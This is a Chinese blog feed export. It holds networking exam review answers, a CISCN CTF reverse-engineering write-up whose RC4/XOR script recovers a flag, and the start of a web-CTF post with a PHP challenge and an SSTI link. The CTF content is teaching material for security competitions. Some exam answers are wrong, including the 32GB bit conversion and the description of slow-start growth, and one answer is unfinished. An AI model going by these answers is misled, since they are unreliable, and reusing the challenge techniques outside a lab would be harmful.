主机B</td><td><code>1A-23-F9-CD-06-9B</code></td><td><code>49-BD-D2-C7-56-2A</code></td><td><code>111.111.111.111</code></td><td><code>222.222.222.222</code></td></tr></tbody></table><p>以上即为数据从主机A到主机B的简要描述，包括网络层和链路层的工作以及MAC地址变化的过程。</p><h4 id="某校园网有两个局域网通过路由器R1，R2和R3互联后接入Internet-S1和S2为以太网交换机。局域网采用静态IP地址配置，路由器部分接口一节个主机的IP地址如下图所示："><a href="#某校园网有两个局域网通过路由器R1，R2和R3互联后接入Internet-S1和S2为以太网交换机。局域网采用静态IP地址配置，路由器部分接口一节个主机的IP地址如下图所示：" class="headerlink" title="某校园网有两个局域网通过路由器R1，R2和R3互联后接入Internet,S1和S2为以太网交换机。局域网采用静态IP地址配置，路由器部分接口一节个主机的IP地址如下图所示："></a>某校园网有两个局域网通过路由器R1，R2和R3互联后接入Internet,S1和S2为以太网交换机。局域网采用静态IP地址配置，路由器部分接口一节个主机的IP地址如下图所示：</h4><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/19dbe61a7443a333456c98a405e4095e.png" alt="img"></p><p><strong><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/5a619b23926087c5d4f7d9d4dc5fcb8c.png" alt="img"></strong></p><h5 id="为使H2和H3能够访问Web服务器（使用默认端口号），需要进行什么配置？"><a href="#为使H2和H3能够访问Web服务器（使用默认端口号），需要进行什么配置？" class="headerlink" title="为使H2和H3能够访问Web服务器（使用默认端口号），需要进行什么配置？"></a>为使H2和H3能够访问Web服务器（使用默认端口号），需要进行什么配置？</h5><p>H2、H3和Web服务器处于不同的局域网，路由器R2R3具有NAT功能。R2从WAN口收到来自H2H3的HTTP请求，根据NAT表发送给Web服务器的对应端口。为使外部主机能正常访问Web服务器，应在R2的NAT表中增加一项。<strong>外网的IP地址配置为路由器的外端IP地址</strong>，<strong>内网的IP地址配置为Web服务器的地址</strong>，<strong>HTTP服务器端的默认端口号的80</strong></p><p>只需要在R2配置，因为我们只知道Web服务器端口号80，而客户端端口号随机分配，无法做静态配置，只能通过自动动态配置实现。</p><p>所以表：</p><table><thead><tr><th>外网</th><th></th><th>内网</th><th></th></tr></thead><tbody><tr><td>IP地址</td><td>端口号</td><td>IP地址</td><td>端口号</td></tr><tr><td>203.10.2.2&#x2F;30</td><td>80</td><td>192.168.1.2</td><td>80</td></tr></tbody></table><h5 id="若H2主动访问Web服务器，将HTTP请求报文封装到IP数据包P中发送，写出过程中的源IP和目标IP变化。三次改变"><a href="#若H2主动访问Web服务器，将HTTP请求报文封装到IP数据包P中发送，写出过程中的源IP和目标IP变化。三次改变" class="headerlink" title="若H2主动访问Web服务器，将HTTP请求报文封装到IP数据包P中发送，写出过程中的源IP和目标IP变化。三次改变"></a>若H2主动访问Web服务器，将HTTP请求报文封装到IP数据包P中发送，写出过程中的源IP和目标IP变化。三次改变</h5><p>H2发送的P的源IP地址和目的IP地址分别是：192.168.1.2和203.10.2.2<br>R3转发后，P的源IP地址和目的IP地址分别是：203.10.2.6和203.10.2.2<br>R2转发后，P的源IP地址和目的IP地址分别是：203.10.2.6和192.168.1.2</p><h4 id="网络拓扑如下图所示："><a href="#网络拓扑如下图所示：" class="headerlink" title="网络拓扑如下图所示："></a>网络拓扑如下图所示：</h4><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217163529475.png" alt="image-20241217163529475" style="zoom:67%;" /><h5 id="（1）CV计算从节点X到其他个节点的最短路径，计算过程写入下表："><a href="#（1）CV计算从节点X到其他个节点的最短路径，计算过程写入下表：" class="headerlink" title="（1）CV计算从节点X到其他个节点的最短路径，计算过程写入下表："></a>（1）CV计算从节点X到其他个节点的最短路径，计算过程写入下表：</h5><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217171237885.png" alt="image-20241217171237885"></p><h5 id="（2）在下表填入算法收敛时节点X的路由表项："><a href="#（2）在下表填入算法收敛时节点X的路由表项：" class="headerlink" title="（2）在下表填入算法收敛时节点X的路由表项："></a>（2）在下表填入算法收敛时节点X的路由表项：</h5><table><thead><tr><th>Destination</th><th>Nexthop</th><th>Cost</th></tr></thead><tbody><tr><td>x</td><td>0</td><td>0</td></tr><tr><td>y</td><td>z</td><td>8</td></tr><tr><td>z</td><td>z</td><td>3</td></tr></tbody></table><h3 id="假设用户共享一条100Mbps的链路，又设每个用户传输数据时需要1Mbps的宽带，并且每个用户仅有10-的时间用于传输数据，其他时间空闲。"><a href="#假设用户共享一条100Mbps的链路，又设每个用户传输数据时需要1Mbps的宽带，并且每个用户仅有10-的时间用于传输数据，其他时间空闲。" class="headerlink" title="假设用户共享一条100Mbps的链路，又设每个用户传输数据时需要1Mbps的宽带，并且每个用户仅有10%的时间用于传输数据，其他时间空闲。"></a>假设用户共享一条100Mbps的链路，又设每个用户传输数据时需要1Mbps的宽带，并且每个用户仅有10%的时间用于传输数据，其他时间空闲。</h3><h4 id="（1）如果使用电路交换（sircuit-switching）最多能支持多少个用户？"><a href="#（1）如果使用电路交换（sircuit-switching）最多能支持多少个用户？" class="headerlink" title="（1）如果使用电路交换（sircuit switching）最多能支持多少个用户？"></a>（1）如果使用电路交换（sircuit switching）最多能支持多少个用户？</h4><p>在电路交换中，每个用户需要独占 <strong>1Mbps</strong> 的带宽进行数据传输。</p><p>链路总带宽为 <strong>100Mbps</strong>，因此最多能支持的用户数为：</p><p>$$<br>\text{最大用户数} &#x3D; \frac{\text{链路总带宽}}{\text{每用户带宽}} &#x3D; \frac{100 , \text{Mbps}}{1 , \text{Mbps}} &#x3D; 100 , \text{个用户}<br>$$</p><h4 id="（2）如果使用分组交换（packet-switching）假定有N个用户，给出在任意时刻又多余M个用户时的传输概率表达式"><a href="#（2）如果使用分组交换（packet-switching）假定有N个用户，给出在任意时刻又多余M个用户时的传输概率表达式" class="headerlink" title="（2）如果使用分组交换（packet switching）假定有N个用户，给出在任意时刻又多余M个用户时的传输概率表达式"></a>（2）如果使用分组交换（packet switching）假定有N个用户，给出在任意时刻又多余M个用户时的传输概率表达式</h4><p>在分组交换中，假设：</p><ul><li>NNN：总用户数。</li><li>每个用户有 p&#x3D;10%&#x3D;0.1p &#x3D; 10% &#x3D; 0.1p&#x3D;10%&#x3D;0.1 的概率在任意时刻发送数据。</li><li>任意时刻，多余 MMM 个用户同时发送数据的概率需要使用 <strong>二项分布</strong>。</li></ul><p><strong>概率表达式</strong>：<br>$$<br>P(X &gt; M) &#x3D; 1 - \sum_{k&#x3D;0}^M \binom{N}{k} p^k (1-p)^{N-k}<br>$$<br>其中：</p><ul><li>X 是同时发送数据的用户数（服从二项分布）。</li><li>\binom{N}{k} 是组合数，表示从 N 个用户中选择 k个用户同时发送数据的方式数。</li><li>p^k 是 k 个用户发送数据的概率。</li><li>(1-p)^{N-k} 是剩余 N−kN-kN−k 个用户不发送数据的概率。</li></ul><h4 id="（3）分析说明Internet采用分组交换的原因"><a href="#（3）分析说明Internet采用分组交换的原因" class="headerlink" title="（3）分析说明Internet采用分组交换的原因"></a>（3）分析说明Internet采用分组交换的原因</h4><p><strong>电路交换的局限性</strong></p><ol><li><strong>资源独占</strong>：在电路交换中，通信链路被独占，资源无法共享，导致利用率低。</li><li><strong>浪费带宽</strong>：用户传输数据仅占用 <strong>10%</strong> 的时间，其余时间空闲，但链路资源依然被预留，造成浪费。</li><li><strong>灵活性不足</strong>：电路交换需要为每个连接提前分配固定的带宽，无法动态适应网络流量变化。</li></ol><p><strong>分组交换的优势</strong></p><ol><li><strong>高资源利用率</strong>：分组交换允许多用户共享链路，数据按需传输，不占用固定资源，极大提高了链路的利用率。</li><li><strong>动态灵活</strong>：网络资源分配是按需进行的，能够适应用户传输数据的不确定性。</li><li><strong>适应突发流量</strong>：分组交换能够处理网络流量的突发性，保证用户数据能够传输，即使偶尔发生拥塞也不会导致全局瘫痪。</li><li><strong>支持多种服务</strong>：分组交换支持不同速率的数据流传输，适用于现代互联网需要传输多媒体数据（视频、语音、文本等）。</li></ol><p><strong>总结</strong></p><p>Internet 采用分组交换，是因为它可以高效地共享网络资源，适应流量突发，降低资源浪费，满足现代互联网多用户和多业务传输的需求。</p><p>以下是图片中文字部分的转写内容：</p><hr><h3 id="六、实验在一条带宽宽裕的链路（图中-connection）上传输一个长度为-L-的数据分组。实验测得在时刻数据分组的第一个-bit-进入该链路，t-时刻数据分组的第一个-bit-离开该链路，t-2-时刻数据分组的最后一个-bit-离开该链路。各时刻示意如图所示，根据下述情况作答：（15-分）"><a href="#六、实验在一条带宽宽裕的链路（图中-connection）上传输一个长度为-L-的数据分组。实验测得在时刻数据分组的第一个-bit-进入该链路，t-时刻数据分组的第一个-bit-离开该链路，t-2-时刻数据分组的最后一个-bit-离开该链路。各时刻示意如图所示，根据下述情况作答：（15-分）" class="headerlink" title="六、实验在一条带宽宽裕的链路（图中 connection）上传输一个长度为 L 的数据分组。实验测得在时刻数据分组的第一个 bit 进入该链路，t 时刻数据分组的第一个 bit 离开该链路，t_2 时刻数据分组的最后一个 bit 离开该链路。各时刻示意如图所示，根据下述情况作答：（15 分）"></a>六、实验在一条带宽宽裕的链路（图中 connection）上传输一个长度为 L 的数据分组。实验测得在时刻数据分组的第一个 bit 进入该链路，t 时刻数据分组的第一个 bit 离开该链路，t_2 时刻数据分组的最后一个 bit 离开该链路。各时刻示意如图所示，根据下述情况作答：（15 分）</h3><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217173223203.png" alt="image-20241217173223203"></p><h4 id="（1）使用上述实验中的变量符号表示该数据分组的传输延迟、传输延迟和吞吐率。（3-分）"><a href="#（1）使用上述实验中的变量符号表示该数据分组的传输延迟、传输延迟和吞吐率。（3-分）" class="headerlink" title="（1）使用上述实验中的变量符号表示该数据分组的传输延迟、传输延迟和吞吐率。（3 分）"></a>（1）使用上述实验中的变量符号表示该数据分组的传输延迟、传输延迟和吞吐率。（3 分）</h4><p><strong>传输延迟（Transmission Delay）</strong>：指数据分组进入链路所需的时间，即数据分组的长度除以带宽：<br>$$<br>\text{传输延迟} &#x3D; \frac{L}{B}<br>$$</p><ul><li>L：数据分组长度（bit）</li><li>B：链路带宽（bit&#x2F;s）</li></ul><p><strong>传播延迟（Propagation Delay）</strong>：指信号在链路上传播的时间，与链路的长度 d 和信号传播速率 v 相关：<br>$$<br>\text{传播延迟} &#x3D; \frac{d}{v}<br>$$</p><ul><li>d：链路长度（米）</li><li>v：信号传播速率（米&#x2F;秒）</li></ul><p><strong>吞吐率（Throughput）</strong>：指单位时间内成功传输的数据量，等于带宽 B：<br>$$<br>\text{吞吐率} &#x3D; B<br>$$</p><h4 id="（2）写出端到端传输延迟计算公式（式中包含分组长度-sL）。（3-分）"><a href="#（2）写出端到端传输延迟计算公式（式中包含分组长度-sL）。（3-分）" class="headerlink" title="（2）写出端到端传输延迟计算公式（式中包含分组长度 sL）。（3 分）"></a>（2）写出端到端传输延迟计算公式（式中包含分组长度 sL）。（3 分）</h4><p>端到端的传输延迟包括<strong>传输延迟</strong>、<strong>传播延迟</strong>和<strong>排队&#x2F;处理延迟</strong>。不考虑排队和处理延迟时，公式为：<br>$$<br>\text{端到端延迟} &#x3D; \text{传输延迟} + \text{传播延迟}<br>$$<br>将各部分代入：<br>$$<br>\text{端到端延迟} &#x3D; \frac{L}{B} + \frac{d}{v}<br>$$</p><ul><li>L：数据分组长度（bit）</li><li>B：链路带宽（bit&#x2F;s）</li><li>d：链路长度（米）</li><li>v：信号传播速率（米&#x2F;秒）</li></ul><h4 id="（3）假设链路往返时延为-100-ms，带宽为-1MB-s，计算发送一封分组长为-4KB-的-email-文件传输出链路所需的端到端传输延迟。（6-分）"><a href="#（3）假设链路往返时延为-100-ms，带宽为-1MB-s，计算发送一封分组长为-4KB-的-email-文件传输出链路所需的端到端传输延迟。（6-分）" class="headerlink" title="（3）假设链路往返时延为 100 ms，带宽为 1MB&#x2F;s，计算发送一封分组长为 4KB 的 email 文件传输出链路所需的端到端传输延迟。（6 分）"></a>（3）假设链路往返时延为 100 ms，带宽为 1MB&#x2F;s，计算发送一封分组长为 4KB 的 email 文件传输出链路所需的端到端传输延迟。（6 分）</h4><ul><li>分组长度</li></ul><p>$$<br>L &#x3D; 4 , \text{KB} &#x3D; 4 \times 1024 \times 8 &#x3D; 32768 , \text{bit}<br>$$</p><ul><li>链路带宽</li></ul><p>$$<br>B &#x3D; 1 , \text{MB&#x2F;s} &#x3D; 8 \times 10^6 , \text{bit&#x2F;s}<br>$$</p><ul><li>往返时延 RTT&#x3D;100 ms（单程时延为 RTT&#x2F;2&#x3D;50 ms）</li></ul><p><strong>步骤 1：计算传输延迟</strong><br>$$<br>\text{传输延迟} &#x3D; \frac{L}{B} &#x3D; \frac{32768}{8 \times 10^6} &#x3D; 0.0041 , \text{s} &#x3D; 4.1 , \text{ms}<br>$$<br><strong>步骤 2：传播延迟</strong><br>单程传播延迟为50ms。</p><p><strong>步骤 3：总延迟</strong><br>$$<br>\text{端到端延迟} &#x3D; \text{传输延迟} + \text{传播延迟}<br>$$</p><p>$$<br>\text{端到端延迟} &#x3D; 4.1 , \text{ms} + 50 , \text{ms} &#x3D; 54.1 , \text{ms}<br>$$</p><h4 id="（4）按照和（3）同样的带宽和传播延迟假设，需要把-32GB-的数据从从天津交付给北京的朋友，时间紧急，时间和金钱，你会选择什么方式来完成？请说明原因。（3-分）"><a href="#（4）按照和（3）同样的带宽和传播延迟假设，需要把-32GB-的数据从从天津交付给北京的朋友，时间紧急，时间和金钱，你会选择什么方式来完成？请说明原因。（3-分）" class="headerlink" title="（4）按照和（3）同样的带宽和传播延迟假设，需要把 32GB 的数据从从天津交付给北京的朋友，时间紧急，时间和金钱，你会选择什么方式来完成？请说明原因。（3 分）"></a>（4）按照和（3）同样的带宽和传播延迟假设，需要把 32GB 的数据从从天津交付给北京的朋友，时间紧急，时间和金钱，你会选择什么方式来完成？请说明原因。（3 分）</h4><p><strong>已知条件</strong>：</p><ul><li>数据大小 32GB&#x3D;32×1024×1024×8&#x3D;2.68×10^11bit</li><li>链路带宽 B&#x3D;1MB&#x2F;s&#x3D;8×10^6bit&#x2F;s</li></ul><p><strong>计算传输时间</strong>：<br>$$<br>\text{传输时间} &#x3D; \frac{L}{B} &#x3D; \frac{2.68 \times 10^{11}}{8 \times 10^6} &#x3D; 33500 , \text{s} \approx 9.3 , \text{小时}<br>$$</p><h3 id="主机A通过TCP连接发送一个文件到主机B，TCP协议使用TCP-Reno版本，下图画出了拥塞窗口岁时间变化的情况，其中发生的时间使用从1到6的序号进行标记，请回答："><a href="#主机A通过TCP连接发送一个文件到主机B，TCP协议使用TCP-Reno版本，下图画出了拥塞窗口岁时间变化的情况，其中发生的时间使用从1到6的序号进行标记，请回答：" class="headerlink" title="主机A通过TCP连接发送一个文件到主机B，TCP协议使用TCP Reno版本，下图画出了拥塞窗口岁时间变化的情况，其中发生的时间使用从1到6的序号进行标记，请回答："></a>主机A通过TCP连接发送一个文件到主机B，TCP协议使用TCP Reno版本，下图画出了拥塞窗口岁时间变化的情况，其中发生的时间使用从1到6的序号进行标记，请回答：</h3><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241217172644333.png" alt="image-20241217172644333" style="zoom:67%;" /><h4 id="1"><a href="#1" class="headerlink" title="(1)"></a>(1)</h4><p><strong>事件 1：窗口大小快速增长</strong></p><ul><li>此时 TCP 正处于<strong>慢启动阶段</strong>（Slow Start）。</li><li>在慢启动阶段，窗口大小（Window Size）按指数增长，即每收到一个 ACK，窗口大小翻倍。</li></ul><p><strong>事件 2：窗口大小达到最大限制（15000 字节）</strong></p><ul><li>TCP 进入<strong>拥塞避免阶段</strong>（Congestion Avoidance）。</li><li>在拥塞避免阶段，窗口大小以线性增长的方式增加。</li></ul><p><strong>事件 3：窗口大小骤降</strong></p><ul><li>此时发生了数据丢失，TCP 检测到拥塞。</li><li>TCP 进入<strong>拥塞控制阶段</strong>，通过<strong>快速重传</strong>或<strong>超时重传</strong>机制，窗口大小被重置。</li></ul><h4 id="2-7500Byte？"><a href="#2-7500Byte？" class="headerlink" title="(2)  7500Byte？"></a>(2)  7500Byte？</h4><h4 id="3）慢开始和快恢复"><a href="#3）慢开始和快恢复" class="headerlink" title="(3）慢开始和快恢复"></a>(3）慢开始和快恢复</h4><p><strong>事件 6：窗口大小重新开始增长</strong></p><ul><li>TCP 重新进入<strong>拥塞控制阶段</strong>，但此时是<strong>拥塞避免阶段</strong>。</li><li>窗口大小呈线性增长，说明 TCP 逐渐恢复并试探网络的可用带宽。</li></ul><h3 id="简述CSMA-CD-中指数退避的基本思想并解释能够有效减少冲突的原因"><a href="#简述CSMA-CD-中指数退避的基本思想并解释能够有效减少冲突的原因" class="headerlink" title="简述CSMA&#x2F;CD 中指数退避的基本思想并解释能够有效减少冲突的原因"></a>简述<strong>CSMA&#x2F;CD 中指数退避的基本思想</strong>并解释能够有效减少冲突的原因</h3><p><strong>CSMA&#x2F;CD</strong>（Carrier Sense Multiple Access with Collision Detection）是一种用于有线局域网（如以太网）的介质访问控制机制，它通过“载波监听”和“冲突检测”来协调多个节点共享同一通信信道。</p><p>当发生冲突时，<strong>指数退避（Exponential Backoff）</strong> 算法被用于减少进一步冲突的概率。</p><h4 id="基本思想"><a href="#基本思想" class="headerlink" title="基本思想"></a>基本思想</h4><ol><li><p><strong>冲突检测</strong>：</p><ul><li>当两个或多个节点同时发送数据，冲突会被检测到，发送数据的节点立即停止发送。</li><li>节点等待一段时间后重新尝试发送数据。</li></ul></li><li><p><strong>退避时间计算</strong>：</p><ul><li><p>节点等待时间是<strong>随机选择</strong>的。</p></li><li><p>退避时间</p><p>按以下规则进行：<br>$$<br>\text{退避时间} &#x3D; k \times \text{时间单位} , \text{(Slot Time)}<br>$$<br>其中：</p><ul><li>kk：从区间[0, 2^n - 1] 中随机选择一个整数（n 是重传尝试次数，最多为 10 次）。</li><li>时间单位为网络的最小传输时延（Slot Time）。</li></ul></li></ul></li><li><p><strong>指数退避</strong>：</p><ul><li><p>每当发生一次冲突，等待的时间范围（区间）会</p><p>指数增加</p><p>：</p><ul><li>第一次冲突：k∈[0,1]k \in [0, 1]</li><li>第二次冲突：k∈[0,3]k \in [0, 3]</li><li>第三次冲突：k∈[0,7]k \in [0, 7]</li><li>…</li><li>第 nn 次冲突：k∈[0,2n−1]k \in [0, 2^n - 1]</li></ul></li><li><p>这样，随着冲突次数的增加，节点等待的时间间隔变得更长，减少了短时间内再次发生冲突的概率。</p></li></ul></li></ol><h4 id="有效减少冲突的原因"><a href="#有效减少冲突的原因" class="headerlink" title="有效减少冲突的原因"></a>有效减少冲突的原因</h4><ol><li><strong>随机退避机制</strong>：<br> 每个节点在重新发送前都会随机选择等待时间，这样可以避免两个节点在相同时间再次发送数据，从而减少连续冲突的概率。</li><li><strong>退避时间指数增加</strong>：<br> 随着冲突次数的增加，退避时间范围会指数增长。这意味着当网络负载较高、冲突频繁时，节点会等待更长的时间再重试，给其他节点更多的机会发送数据，从而逐渐缓解网络拥塞。</li><li><strong>动态调整机制</strong>：<br> 指数退避是<strong>自适应</strong>的，它根据冲突的严重程度动态调整退避时间。在轻载情况下，节点可以快速重传；在重载情况下，退避时间较长，冲突概率自然降低。</li></ol><h2 id="2023级"><a href="#2023级" class="headerlink" title="2023级"></a>2023级</h2><p>这里感谢我的舍友在考完后立马给我的一手资料（跪</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/170e8e3d1bc312c5ed04f9d5892b302.jpg" alt="img"></p><p>NAT转换表、交换机自学习、MAC IP地址变化</p><p>分组交换、电路交换 端到端延迟</p><p>网络拓扑Dijkstra 路由表</p><p>停等类和流水线类 更大链路利用率</p><p>DNS主要功能 基本工作原理 分布式设计原因</p><p>TCP Reno</p><p>CSMA&#x2F;CD是那种网络采用的MAC协议、基本原理；多用户竞争情况下，能高效利用链路，分析其中所采取的机制或措施</p>]]></content>
    
    
      
      
    <summary type="html">&lt;p&gt;很好，刚想起来后天早八寄网期末考&lt;/p&gt;
&lt;p&gt;以下题目都在 &lt;a href=&quot;https://github.com/superpung/TJU-CourseSharing/tree/main/2440130_%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%B</summary>
      
    
    
    
    
  </entry>
  
  <entry>
    <title>CISCN&amp;CCB 2025 初赛</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/16/ciscn-ccb-2025-chu-sai/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/16/ciscn-ccb-2025-chu-sai/</id>
    <published>2024-12-16T05:40:57.199Z</published>
    <updated>2024-12-28T06:16:11.987Z</updated>
    
    <content type="html"><![CDATA[<h1 id="CISCN-CCB-2025-初赛"><a href="#CISCN-CCB-2025-初赛" class="headerlink" title="CISCN&amp;CCB 2025 初赛"></a>CISCN&amp;CCB 2025 初赛</h1><h2 id="ezCsky"><a href="#ezCsky" class="headerlink" title="ezCsky"></a>ezCsky</h2><h3 id="题目分析"><a href="#题目分析" class="headerlink" title="题目分析"></a>题目分析</h3><p>IDA缺少插件，无法分析，那——直接用8086或者选择别的解析方式呢？</p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241216133245971.png" alt="image-20241216133245971" style="zoom: 50%;" /><p>确实可以，但是模模糊糊的！</p><p>但还是能看到大致的逻辑，先异或、再rc4初始化加密、最后对比</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241216134011830.png" alt="image-20241216134011830"></p><p>比赛时候解出来”}“没想到是最后一位逐位异或（qwq可惜）</p><p>可以看到check和xor长得特别想，一想啊，check从头开始逐位检查，xor从头开始异或（怪不得一模一样（原来如此</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241216133645027.png" alt="image-20241216133645027" style="zoom:50%;" /><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241216133700066.png" alt="image-20241216133700066" style="zoom:50%;" /></p><p>还是要吐槽！！！！这密钥是testkey我真服了！！！！！（怀疑了很久（</p><h3 id="解题脚本"><a href="#解题脚本" class="headerlink" title="解题脚本"></a>解题脚本</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Cipher <span class="keyword">import</span> ARC4</span><br><span class="line"></span><br><span class="line">key = <span class="string">b&#x27;testkey&#x27;</span></span><br><span class="line">encrypted_data = <span class="built_in">bytes</span>([</span><br><span class="line">    <span class="number">0x96</span>, <span class="number">0x8F</span>, <span class="number">0xB8</span>, <span class="number">0x08</span>, <span class="number">0x5D</span>, <span class="number">0xA7</span>, <span class="number">0x68</span>, <span class="number">0x44</span>, <span class="number">0xF2</span>, <span class="number">0x64</span>, </span><br><span class="line">    <span class="number">0x92</span>, <span class="number">0x64</span>, <span class="number">0x42</span>, <span class="number">0x7A</span>, <span class="number">0x78</span>, <span class="number">0xE6</span>, <span class="number">0xEA</span>, <span class="number">0xC2</span>, <span class="number">0x78</span>, <span class="number">0xB8</span>, </span><br><span class="line">    <span class="number">0x63</span>, <span class="number">0x9E</span>, <span class="number">0x5B</span>, <span class="number">0x3D</span>, <span class="number">0xD9</span>, <span class="number">0x28</span>, <span class="number">0x3F</span>, <span class="number">0xC8</span>, <span class="number">0x73</span>, <span class="number">0x06</span>, </span><br><span class="line">    <span class="number">0xEE</span>, <span class="number">0x6B</span>, <span class="number">0x8D</span>, <span class="number">0x0C</span>, <span class="number">0x4B</span>, <span class="number">0xA3</span>, <span class="number">0x23</span>, <span class="number">0xAE</span>, <span class="number">0xCA</span>, <span class="number">0x40</span>, </span><br><span class="line">    <span class="number">0xED</span>, <span class="number">0xD1</span></span><br><span class="line">])</span><br><span class="line"></span><br><span class="line">cipher = ARC4.new(key)</span><br><span class="line"></span><br><span class="line">decrypted_data = <span class="built_in">bytearray</span>(cipher.decrypt(encrypted_data))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="built_in">len</span>(decrypted_data)):</span><br><span class="line">    index1 = <span class="built_in">len</span>(decrypted_data) - <span class="number">2</span> - i</span><br><span class="line">    index2 = <span class="built_in">len</span>(decrypted_data) - <span class="number">1</span> - i</span><br><span class="line">    <span class="keyword">if</span> index1 &lt; <span class="number">0</span> <span class="keyword">or</span> index2 &lt; <span class="number">0</span>:</span><br><span class="line">        <span class="keyword">break</span>  </span><br><span class="line">    decrypted_data[index1] ^= decrypted_data[index2]</span><br><span class="line"></span><br><span class="line">decrypted_text = decrypted_data.decode(<span class="string">&#x27;utf-8&#x27;</span>)</span><br><span class="line"><span class="built_in">print</span>(decrypted_text)</span><br><span class="line"></span><br><span class="line"><span class="comment">#flag&#123;d0f5b330-9a74-11ef-9afd-acde48001122&#125;</span></span><br></pre></td></tr></table></figure><h2 id="dump"><a href="#dump" class="headerlink" title="dump"></a>dump</h2><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">./re.exe <span class="number">123</span></span><br></pre></td></tr></table></figure><p>打表对应每一位，手动爆破</p><h2 id="rand0m"><a href="#rand0m" class="headerlink" title="rand0m"></a>rand0m</h2><p><a href="https://www.a1natas.com/2024-CISCNxCCB/#rand0m">A1natas 2024 CISCN x 长城杯铁人三项 初赛 WriteUp</a></p><p>参考文章</p>]]></content>
    
    
      
      
    <summary type="html">&lt;h1 id=&quot;CISCN-CCB-2025-初赛&quot;&gt;&lt;a href=&quot;#CISCN-CCB-2025-初赛&quot; class=&quot;headerlink&quot; title=&quot;CISCN&amp;amp;CCB 2025 初赛&quot;&gt;&lt;/a&gt;CISCN&amp;amp;CCB 2025 初赛&lt;/h1&gt;&lt;h2 i</summary>
      
    
    
    
    
    <category term="Re" scheme="https://github.com/xyy9233/xyy9233.github.io.git/tags/Re/"/>
    
  </entry>
  
  <entry>
    <title>Web的一些小东西</title>
    <link href="https://github.com/xyy9233/xyy9233.github.io.git/2024/12/05/web/"/>
    <id>https://github.com/xyy9233/xyy9233.github.io.git/2024/12/05/web/</id>
    <published>2024-12-05T14:28:12.132Z</published>
    <updated>2024-12-23T13:24:09.138Z</updated>
    
    <content type="html"><![CDATA[<h1 id="？要不？学点web？"><a href="#？要不？学点web？" class="headerlink" title="？要不？学点web？"></a>？要不？学点web？</h1><p>orz一个队四个人，常常因为没学过web和大家格格不入，这里简单写几个web类型，（qwq（至少刚开始打CTF是因为学姐是学web的所以学了一段时间web（</p><p>pwn日活达标了就学web，实在都不想看就去搓逆向。（逆向，哭了</p><p>不管怎么说，反正我要学（</p><h2 id="SWPUCTF-2021-新生赛-jicao"><a href="#SWPUCTF-2021-新生赛-jicao" class="headerlink" title="[SWPUCTF 2021 新生赛]jicao"></a>[SWPUCTF 2021 新生赛]jicao</h2><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="title function_ invoke__">highlight_file</span>(<span class="string">&#x27;index.php&#x27;</span>);</span><br><span class="line"><span class="keyword">include</span>(<span class="string">&quot;flag.php&quot;</span>);</span><br><span class="line"><span class="variable">$id</span>=<span class="variable">$_POST</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line"><span class="variable">$json</span>=<span class="title function_ invoke__">json_decode</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;json&#x27;</span>],<span class="literal">true</span>);</span><br><span class="line"><span class="keyword">if</span> (<span class="variable">$id</span>==<span class="string">&quot;wllmNB&quot;</span>&amp;&amp;<span class="variable">$json</span>[<span class="string">&#x27;x&#x27;</span>]==<span class="string">&quot;wllm&quot;</span>)</span><br><span class="line">&#123;<span class="keyword">echo</span> <span class="variable">$flag</span>;&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><p>post传id，get传json</p><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241205222648702.png" alt="image-20241205222648702"></p><h2 id="HNCTF-2022-WEEK2-ez-SSTI"><a href="#HNCTF-2022-WEEK2-ez-SSTI" class="headerlink" title="[HNCTF 2022 WEEK2]ez_SSTI"></a>[HNCTF 2022 WEEK2]ez_SSTI</h2><p>很贴心的给了ssti相关链接：</p><blockquote><h1 id="WELCOME-TO-HNCTF"><a href="#WELCOME-TO-HNCTF" class="headerlink" title="WELCOME TO HNCTF"></a>WELCOME TO HNCTF</h1><p><a href="https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection#python">What is server-side template injection?</a></p><h3 id="None"><a href="#None" class="headerlink" title="None"></a>None</h3></blockquote><p><img src="https://xyy9233.oss-cn-beijing.aliyuncs.com/hexoblog/image-20241211154931678.png" alt="image-20241211154931678"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span 